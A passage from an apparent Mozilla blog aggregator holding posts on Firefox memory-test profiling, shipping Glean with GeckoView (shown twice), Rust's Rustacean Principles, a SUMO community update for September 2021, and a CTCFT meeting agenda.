So we hack testing/marionette/client/marionette_driver/marionette.py to replace shutdown_timeout with 300 in some places. Setting DEFAULT_SHUTDOWN_TIMEOUT and also self.shutdown_timeout to 300 will do. There’s probably a way to pass a parameter, but I didn’t find it yet. So after making that change and running ./mach build the invocation is now:

export MOZ_PROFILER_STARTUP=1
export MOZ_PROFILER_SHUTDOWN=awsy-profile.json
export MOZ_PROFILER_STARTUP_FEATURES=""
export MOZ_PROFILER_STARTUP_ENTRIES=$((200*1024*1024))
./mach awsy-test --tp6 --headless --iterations 1 --entities 10

And it writes a awsy-profile.json into the root directory of the project).

Hurray!

Data@MozillaThis Week in Glean: Glean & GeckoView

(“This Week in Glean” is a series of blog posts that the Glean Team at Mozilla is using to try to communicate better about our work. They could be release notes, documentation, hopes, dreams, or whatever: so long as it is inspired by Glean.) All “This Week in Glean” blog posts are listed in the TWiG index.


This is a followup post to Shipping Glean with GeckoView.

It landed!

It took us several more weeks to put everything into place, but we’re finally shipping the Rust parts of the Glean Android SDK with GeckoView and consume that in Android Components and Fenix. And it still all works, collects data and is sending pings! Additionally this results in a slightly smaller APK as well.

This unblocks further work now. Currently Gecko simply stubs out all calls to Glean when compiled for Android, but we will enable recording Glean metrics within Gecko and exposing them in pings sent from Fenix. We will also start work on moving other Rust components into mozilla-central in order for them to use the Rust API of Glean directly. Changing how we deliver the Rust code also made testing Glean changes across these different components a bit more challenging, so I want to invest some time to make that easier again.

Jan-Erik RedigerThis Week in Glean: Glean & GeckoView

(“This Week in Glean” is a series of blog posts that the Glean Team at Mozilla is using to try to communicate better about our work. They could be release notes, documentation, hopes, dreams, or whatever: so long as it is inspired by Glean.) All "This Week in Glean" blog posts are listed in the TWiG index (and on the Mozilla Data blog). This article is cross-posted on the Mozilla Data blog.


This is a followup post to Shipping Glean with GeckoView.

It landed!

It took us several more weeks to put everything into place, but we're finally shipping the Rust parts of the Glean Android SDK with GeckoView and consume that in Android Components and Fenix. And it still all works, collects data and is sending pings! Additionally this results in a slightly smaller APK as well.

This unblocks further work now. Currently Gecko simply stubs out all calls to Glean when compiled for Android, but we will enable recording Glean metrics within Gecko and exposing them in pings sent from Fenix. We will also start work on moving other Rust components into mozilla-central in order for them to use the Rust API of Glean directly. Changing how we deliver the Rust code also made testing Glean changes across these different components a bit more challenging, so I want to invest some time to make that easier again.

Niko MatsakisRustacean Principles, continued

RustConf is always a good time for reflecting on the project. For me, the last week has been particularly “reflective”. Since announcing the Rustacean Principles, I’ve been having a number of conversations with members of the community about how they can be improved. I wanted to write a post summarizing some of the feedback I’ve gotten.

The principles are a work-in-progress

Sparking conversation about the principles was exactly what I was hoping for when I posted the previous blog post. The principles have mostly been the product of Josh and I iterating, and hence reflect our experiences. While the two of us have been involved in quite a few parts of the project, for the document to truly serve its purpose, it needs input from the community as a whole.

Unfortunately, for many people, the way I presented the principles made it seem like I was trying to unveil a fait accompli, rather than seeking input on a work-in-progress. I hope this post makes the intention more clear!

The principles as a continuation of Rust’s traditions

Rust has a long tradition of articulating its values. This is why we have a Code of Conduct. This is why we wrote blog posts like Fearless Concurrency, Stability as a Deliverable and Rust Once, Run Anywhere. Looking past the “engineering side” of Rust, aturon’s classic blog posts on listening and trust (part 1, part 2, part 3) did a great job of talking about what it is like to be on a Rust team. And who could forget the whole “fireflowers” debate?1

My goal with the Rustacean Principles is to help coalesce the existing wisdom found in those classic Rust blog posts into a more concise form. To that end, I took initial inspiration from how AWS uses tenets, although by this point the principles have evolved into a somewhat different form. I like the way tenets use short, crisp statements that identify important concepts, and I like the way assigning a priority ordering helps establish which should have priority. (That said, one of Rust’s oldest values is synthesis: we try to find ways to resolve constraints that are in tension by having our cake and eating it too.)

Given all of this backdrop, I was pretty enthused by a suggestion that I heard from Jacob Finkelman. He suggested adapting the principles to incorporate more of the “classic Rust catchphrases”, such as the “no new rationale” rule described in the first blog post from aturon’s series. A similar idea is to incorporate the lessons from RFCs, both successful and unsuccessful (this is what I was going for in the case studies section, but that clearly needs to be expanded).

The overall goal: Empowerment

My original intention was to structure the principles as a cascading series of ideas:

  • Rust’s top-level goal: Empowerment
    • Principles: Dissecting empowerment into its constituent pieces – reliable, performant, etc – and analyzing the importance of those pieces relative to one another.
      • Mechanisms: Specific rules that we use, like type safety, that engender the principles (reliability, performance, etc.). These mechanisms often work in favor of one principle, but can work against others.

wycats suggested that the site could do a better job of clarifying that empowerment is the top-level, overriding goal, and I agree. I’m going to try and tweak the site to make it clearer.

A goal, not a minimum bar

The principles in “How to Rustacean” were meant to be aspirational: a target to be reaching for. We’re all human: nobody does everything right all the time. But, as Matklad describes, the principles could be understood as setting up a kind of minimum bar – to be a team member, one has to show up, follow through, trust and delegate, all while bringing joy? This could be really stressful for people.

The goal for the “How to Rustacean” section is to be a way to lift people up by giving them clear guidance for how to succeed; it helps us to answer people when they ask “what should I do to get onto the lang/compiler/whatever team”. The internals thread had a number of good ideas for how to help it serve this intended purpose without stressing people out, such as cuviper’s suggestion to use fictional characters like Ferris in examples, passcod’s suggestion of discussing inclusion, or Matklad’s proposal to add something to the effect of “You don’t have to be perfect” to the list. Iteration needed!

Scope of the principles

Some people have wondered why the principles are framed in a rather general way, one that applies to all of Rust, instead of being specific to the lang team. It’s a fair question! In fact, they didn’t start this way. They started their life as a rather narrow set of “design tenets for async” that appeared in the async vision doc. But as those evolved, I found that they were starting to sound like design goals for Rust as a whole, not specifically for async.

Trying to describe Rust as a “coherent whole” makes a lot of sense to me. After all, the experience of using Rust is shaped by all of its facets: the language, the libraries, the tooling, the community, even its internal infrastructure (which contributes to that feeling of reliability by ensuring that the releases are available and high quality). Every part has its own role to play, but they are all working towards the same goal of empowering Rust’s users.2

There is an interesting question about the long-term trajectory for this work. In my mind, the principles remain something of an experiment. Presuming that they prove to be useful, I think that they would make a nice RFC.

What about “easy”?

One final bit of feedback I heard from Carl Lerche is surprise that the principles don’t include the word “easy”. This not an accident. I felt that “easy to use” was too subjective to be actionable, and that the goals of productive and supportive were more precise. However, I do think that for people to feel empowered, it’s important for them not feel mentally overloaded, and Rust can definitely have the problem of carrying a high mental load sometimes.

I’m not sure the best way to tweak the “Rust empowers by being…” section to reflect this, but the answer may lie with the Cognitive Dimensions of Notation. I was introduced to these from Felienne Herman’s excellent book The Programmer’s Brain; I quite enjoyed this journal article as well.

The idea of the CDN is to try and elaborate on the ways that tools can be easier or harder to use for a particular task. For example, Rust would likely do well on the “error prone” dimension, in that when you make changes, the compiler generally helps ensure they are correct. But Rust does tend to have a high “viscosity”, because making local changes tends to be difficult: adding a lifetime, for example, can require updating data structures all over the code in an annoying cascade.

It’s important though to keep in mind that the CDN will vary from task to task. There are many kinds of changes one can make in Rust with very low viscosity, such as adding a new dependency. On the other hand, there are also cases where Rust can be error prone, such as mixing async runtimes.

Conclusion

In retrospect, I wish I had introduced the concept of the Rustacean Principles in a different way. But the subsequent conversations have been really great, and I’m pretty excited by all the ideas on how to improve them. I want to encourage folks again to come over to the internals thread with their thoughts and suggestions.

  1. Love that web page, brson

  2. One interesting question: I do think that some tools may vary the prioritization of different aspects of Rust. For example, a tool for formal verification is obviously aimed at users that particularly value reliability, but other tools may have different audiences. I’m not sure yet the best way to capture that, it may well be that each tool can have its own take on the way that it particularly empowers. 

Support.Mozilla.OrgWhat’s up with SUMO – September 2021

Hey SUMO folks,

September is going to be the last month for Q3, so let’s see what we’ve been up to for the past quarter.

Welcome on board!

  1. Welcome to SUMO family for Bithiah, mokich1one, handisutrian, and Pomarańczarz. Bithiah has been pretty active on contributing to the support forum for a while now, while Mokich1one, Handi, and Pomarańczarz are emerging localization contributors respectively for Japanese, Bahasa Indonesia, and Polish.

Community news

  • Read our post about the advanced customization in the forum and KB here and let us know if you still have any questions!
  • Please join me to welcome Abby into the Customer Experience Team. Abby is our new Content Manager who will be in charge of our Knowledge Base as well as Localization effort. You can learn more about Abby soon.
  • Learn more about Firefox 92 here.
  • Can you imagine what’s gonna happen when we reach version 100? Learn more about the experiment we’re running in Firefox Nightly here and see how you can help!
  • Are you a fan of Firefox Focus? Join our foxfooding campaign for focus that is coming. You can learn more about the campaign here.
  • No Kitsune update for this month. Check out SUMO Engineering Board instead to see what the team is currently doing.

Community call

  • Watch the monthly community call if you haven’t. Learn more about what’s new in August!
  • Reminder: Don’t hesitate to join the call in person if you can. We try our best to provide a safe space for everyone to contribute. You’re more than welcome to lurk in the call if you don’t feel comfortable turning on your video or speaking up. If you feel shy to ask questions during the meeting, feel free to add your questions on the contributor forum in advance, or put them in our Matrix channel, so we can address them during the meeting.

Community stats

KB

KB pageviews (*)

* KB pageviews number is a total of KB pageviews for /en-US/ only
Month Page views Vs previous month
Aug 2021 8,462,165 +2.47%

Top 5 KB contributors in the last 90 days: 

  1. AliceWyman
  2. Thomas8
  3. Michele Rodaro
  4. K_alex
  5. Pierre Mozinet

KB Localization

Top 10 locale based on total page views

Locale Aug 2021 pageviews (*) Localization progress (per Sep, 7)(**)
de 8.57% 99%
zh-CN 6.69% 100%
pt-BR 6.62% 63%
es 5.95% 44%
fr 5.43% 91%
ja 3.93% 57%
ru 3.70% 100%
pl 1.98% 100%
it 1.81% 86%
zh-TW 1.45% 6%
* Locale pageviews is an overall pageviews from the given locale (KB and other pages)

** Localization progress is the percentage of localized article from all KB articles per locale

Top 5 localization contributors in the last 90 days: 

  1. Milupo
  2. Michele Rodaro
  3. Jim Spentzos
  4. Soucet
  5. Artist

Forum Support

Forum stats

Month Total questions Answer rate within 72 hrs Solved rate within 72 hrs Forum helpfulness
Aug 2021 3523 75.59% 17.40% 66.67%

Top 5 forum contributors in the last 90 days: 

  1. FredMcD
  2. Cor-el
  3. Jscher2000
  4. Seburo
  5. Sfhowes

Social Support

Channel Aug 2021
Total conv Conv interacted
@firefox 2967 341
@FirefoxSupport 386 270

Top contributors in Aug 2021

  1. Christophe Villeneuve
  2. Andrew Truong
  3. Pravin

Play Store Support

We don’t have enough data for the Play Store Support yet. However, you can check out the overall Respond Tool metrics here.

Product updates

Firefox desktop

Firefox mobile

Other products / Experiments

  • Mozilla VPN V2.5 Expected to release 09/15
  • Fx Search experiment:
    • From Sept 6, 2021 1% of the Desktop user base will be experimenting with Bing as the default search engine. The study will last into early 2022, likely wrapping up by the end of January.
    • Common response:
      • Forum: Search study – September 2021
      • Conversocial clipboard: “Mozilla – Search study sept 2021”
      • Twitter: Hi, we are currently running a study that may cause some users to notice that their default search engine has changed. To revert back to your search engine of choice, please follow the steps in the following article → https://mzl.la/3l5UCLr
  • Firefox Suggest + Data policy update (Sept 16 + Oct 5)
    • September 16th, the Mozilla Privacy Policy will be updated to supplement the roll out of FX Suggest online mode. Currently, FX Suggest is utilizing offline mode which limits the data collected. Online mode will collect additional anonymized information after users opt-in to this feature. Users can opt-out of this experience by following the instructions here.

Shout-outs!

  • Kudos for Julie for her work in the Knowledge Base lately. She’s definitely adding a new color in our KB world with her video and article improvement.
  • Thanks to those who contributed to the FX Desktop Topics Discussion
    • If you have input or questions please post them to the thread above

If you know anyone that we should feature here, please contact Kiki and we’ll make sure to   add them in our next edition.

Useful links:

Niko MatsakisCTCFT 2021-09-20 Agenda

The next “Cross Team Collaboration Fun Times” (CTCFT) meeting will take place next Monday, on 2021-09-20 (in your time zone)! This post covers the agenda. You’ll find the full details (along with a calendar event, zoom details, etc) on the CTCFT website.

Agenda

  • Announcements
  • Interest group panel discussion

We’re going to try something a bit different this time! The agenda is going to focus on Rust interest groups and domain working groups, those brave explorers who are trying to put Rust to use on all kinds of interesting domains. Rather than having fixed presentations, we’re going to have a panel discussion with representatives from a number of Rust interest groups and domain groups, led by AngelOnFira. The idea is to open a channel for communication about how to have more active communication and feedback between interest groups and the Rust teams (in both directions).

Afterwards: Social hour

After the CTCFT this week, we are going to try an experimental social hour. The hour will be coordinated in the #ctcft stream of the rust-lang Zulip. The idea is to create breakout rooms where people can gather to talk, hack together, or just chill.